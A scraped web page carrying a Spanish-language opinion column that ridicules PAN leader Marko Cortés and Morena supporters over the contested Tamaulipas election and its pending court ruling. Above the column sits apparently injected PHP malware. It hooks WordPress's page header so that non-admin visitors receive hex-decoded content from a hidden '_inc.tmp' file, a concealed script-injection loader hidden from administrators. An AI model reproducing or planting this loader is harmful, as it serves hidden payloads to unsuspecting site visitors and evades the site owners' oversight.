if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } No pues guau – Reporte Noreste
Conéctate con nosotros

Opinión

No pues guau

No pues guau

El dirigente del Comité Ejecutivo Nacional del PAN Marko Antonio Cortés Mendoza está loquito o luego de las elecciones del pasado 5 de junioquedó tocado de sus facultades mentales.

Resulta que el muy “valiente”, utilizó sus mensajeros para hacerse presente en el electorado tamaulipeco a través de las redes sociales con un mensaje baratísimo: “sépanse no solos, acompañados en esta lucha que ustedes están dando con mucho valor con mucha fuerza para defender el voto de las y los tamaulipecos. Mi querido Cesar, mi candidato Truko, no estas solo”, relató Cortés Mendoza seguido de su Secretaría del CEN, y dirigentes estatales del Partido Acción Nacional.

¿Pero en verdad cree Marko Cortés que eso funciona? Quién le dijo que los tamaulipecos estaban esperando su pronunciamiento, seguro eran las palabras que el pueblo cuerudo quería escuchar para terminar de pasar un fin de semana tranquila, en paz y ordenado.

Están pero bien mal los políticos. Primero los de morena convocando a la recolección de firmas para defender el voto, perdón, jajajajajajajajajajajajaja.

Luego el panismo con ese mensaje que asegura la elección se va a caer en Tamaulipas, que hay argumentos de sobra, que según no pueden permitir ir hacia atrás en lo avanzado en materia de seguridad, y quizás tengan razón, solo que ese mensaje va dirigido a puro votante sin la más mínima capacidad de razonamiento, porque ni el PAN con esos videos, ni morena con sus toneladas de firmas van hacer que los magistrados cambien de parecer, son estos políticos unos ridículos.

Los morenistas allegados a Villarreal Anaya me recordaron a aquel jugador de fútbol que al minuto 85 de tiempo corrido no ve por dónde frenar la embestida rival, con el marcador 2-1 a su favor, y luego de tres balones reventados en el poste de su portería incita a la afición para que silbe fuerte, atúrda al árbitro central y lo presione para que adelante el final del juego; el jugador está colgado del travesaño, ya no quiere nada pero el arbitro es la autoridad y el partido está pactado a 90 minutos, no a menos, en todo caso si lo considera, puede agregar más tiempo, así es la regla.

Los morenistas reclaman al Tribunal Electoral del Poder Judicial de la Federación (TEPJF), todo el tiempo que se ha tardado para emitir el fallo respecto a la elección de Tamaulipas, se dedicaron a recabar firmas como la silbatina en el estadio, pobres ilusos, no es cuando ellos quieran será cuado los magistrados lo consideren según la ley, el tiempo permitido y según lo amerita el caso.

No es antes, ni después, es al tiempo del TEPJF, y si fallan a favor de uno y otro, el perdedor deberá tragar pinole, pero usted no sea tonto, no se deje engañar. No es lo que diga Marko Cortés, ni tampoco lo que haya firmado en la plaza pública, ya deje de ser tan iluso que por eso al país se lo está llevando el carajo.

En la intimidad… Me encontré a América Sandoval, le pedí que me regalara un perrito, le dije que quiero una mascota pero que sea un perrito de esos callejeros que no tienen hogar, amor, y muy poca suerte, ella sabe que le voy a poner de nombre: Andrés García.

davidcastellanost@hotmail.com
@dect1608

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Opinión